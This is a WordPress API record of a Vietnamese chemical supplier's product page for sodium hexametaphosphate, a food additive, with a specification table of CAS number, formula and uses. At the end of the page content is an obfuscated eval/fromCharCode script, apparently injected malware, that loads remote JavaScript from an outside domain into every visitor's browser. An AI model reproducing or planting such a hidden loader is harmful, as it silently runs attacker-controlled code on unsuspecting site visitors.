{"id":3618,"date":"2023-03-22T08:17:41","date_gmt":"2023-03-22T08:17:41","guid":{"rendered":"http:\/\/site2.easyceotech.com\/?post_type=product&#038;p=3618"},"modified":"2023-03-22T08:17:41","modified_gmt":"2023-03-22T08:17:41","slug":"sodium-hexametaphosphate","status":"publish","type":"product","link":"https:\/\/wpachem.com\/vi\/product\/sodium-hexametaphosphate\/","title":{"rendered":"Natri hexametaphosphat"},"content":{"rendered":"<p><b>Natri polyphosphate<\/b>, d\u1ec5 tan trong n\u01b0\u1edbc, kh\u00f4ng tan trong dung m\u00f4i h\u1eefu c\u01a1. \u0110\u1ed9 h\u00fat \u1ea9m m\u1ea1nh, d\u1ec5 th\u1ee7y ph\u00e2n th\u00e0nh orthophosphate trong n\u01b0\u1edbc \u1ea5m, dung d\u1ecbch axit ho\u1eb7c ki\u1ec1m. Ch\u1ee7 y\u1ebfu d\u00f9ng \u0111\u1ec3 ch\u1ebf bi\u1ebfn c\u00e1c lo\u1ea1i s\u1ea3n ph\u1ea9m th\u1ecbt v\u00e0 th\u1ee9c \u0103n gia c\u1ea7m.<\/p>\n<p>&nbsp;<\/p>\n<div class=\"J_module\">\n<div id=\"ali-anchor-AliMagic-zr76kk\" class=\"magic-0\" data-section=\"AliMagic-zr76kk\" data-section-title=\"Specification\" data-spm-anchor-id=\"a2700.details.0.i19.38db4919LxSfVd\">\u0110\u1eb7c \u0111i\u1ec3m k\u1ef9 thu\u1eadt<\/div>\n<\/div>\n<div class=\"J_module\">\n<div class=\"ife-detail-decorate-table\">\n<table class=\"has-title all magic-10\">\n<tbody>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">T\u00ean s\u1ea3n ph\u1ea9m<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">Natri polyphosphate<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">CAS<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">68915-31-1<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">C\u00f4ng th\u1ee9c ph\u00e2n t\u1eed<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">Na3O10P3X2<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">Tr\u1ecdng l\u01b0\u1ee3ng ph\u00e2n t\u1eed<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">321.88<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">EINECS<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">272-808-3<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">H\u00ecnh th\u1ee9c<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">B\u1ed9t tinh th\u1ec3 m\u00e0u tr\u1eafng<\/div>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-11\">\u1ee8ng d\u1ee5ng<\/div>\n<\/td>\n<td colspan=\"1\" rowspan=\"1\">\n<div class=\"magic-12\">Ch\u1ea5t c\u1ea3i thi\u1ec7n ch\u1ea5t l\u01b0\u1ee3ng; Ch\u1ea5t \u0111i\u1ec1u ch\u1ec9nh PH; Ch\u1ea5t t\u1ea1o ph\u1ee9c ion kim lo\u1ea1i; Ch\u1ea5t k\u1ebft d\u00ednh v\u00e0 ch\u1ea5t gi\u00e3n n\u1edf, v.v. N\u00f3 c\u00f3 th\u1ec3 \u1ed5n \u0111\u1ecbnh c\u00e1c s\u1eafc t\u1ed1 t\u1ef1 nhi\u00ean trong<br \/>\n\u0111\u1eadu \u0111\u00f3ng h\u1ed9p, tr\u00e1i c\u00e2y v\u00e0 rau qu\u1ea3, v\u00e0 b\u1ea3o v\u1ec7 m\u00e0u th\u1ef1c ph\u1ea9m; Ch\u1ea5t b\u00e9o c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c nh\u0169 h\u00f3a trong h\u1ed9p th\u1ecbt \u0111\u1ec3 gi\u1eef cho k\u1ebft c\u1ea5u \u0111\u1ed3ng \u0111\u1ec1u;<br \/>\nN\u00f3 c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong c\u00e1c s\u1ea3n ph\u1ea9m th\u1ecbt \u0111\u1ec3 c\u1ea3i thi\u1ec7n kh\u1ea3 n\u0103ng gi\u1eef n\u01b0\u1edbc v\u00e0 ng\u0103n ch\u1ea5t b\u00e9o trong th\u1ecbt b\u1ecb h\u01b0 h\u1ecfng. Khi th\u00eam v\u00e0o bia,<br \/>\nc\u00f3 th\u1ec3 l\u00e0m trong n\u01b0\u1edbc \u0111\u1ec3 tr\u00e1nh t\u00ecnh tr\u1ea1ng \u0111\u1ee5c. Ch\u1ea5t l\u01b0\u1ee3ng n\u01b0\u1edbc kh\u00f4ng c\u00f3 ch\u1ea5t l\u00e0m m\u1ec1m k\u1ebft t\u1ee7a.<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>T\u00ean s\u1ea3n ph\u1ea9m: Natri hexametaphosphate<br \/>\nS\u1ed1 CAS: 68915-31-1<br \/>\nMF:Na3O10P3X2<br \/>\nNgo\u1ea1i h\u00ecnh: s\u1ee9c m\u1ea1nh m\u00e0u tr\u1eafng<\/p>","protected":false},"featured_media":2159,"template":"","meta":{"_acf_changed":false,"_gspb_post_css":""},"product_brand":[],"product_cat":[55],"product_tag":[],"class_list":{"0":"post-3618","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-food-additives","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product\/3618","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product\/3618\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/media\/2159"}],"wp:attachment":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/media?parent=3618"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_brand?post=3618"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_cat?post=3618"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_tag?post=3618"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}